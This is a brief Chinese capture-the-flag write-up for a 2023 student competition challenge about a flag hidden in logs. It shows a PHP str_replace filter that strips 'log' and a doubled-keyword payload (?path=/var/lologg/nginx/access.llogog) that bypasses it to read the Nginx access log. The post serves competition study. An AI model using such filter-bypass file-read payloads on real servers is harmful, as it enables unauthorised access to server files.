2023 技能兴鲁“信息创大赛” 学生组 日志里的Flag
日志里的FLAG:
提示说在日志里面,访问网页探测为Nginx服务器,读nginx对应的日志:
分析服务器为Nginx 读取对应日志位置
上代码:
1 | |
$path = str_replace("log","", $path);替换,使用双写进行绕过
/var/lologg/nginx/access.llogog
Payload
?path=/var/lologg/nginx/access.llogog‘
2023 技能兴鲁“信息创大赛” 学生组 日志里的Flag
https://chrrr1y.github.io/2023/11/16/2023技能兴鲁/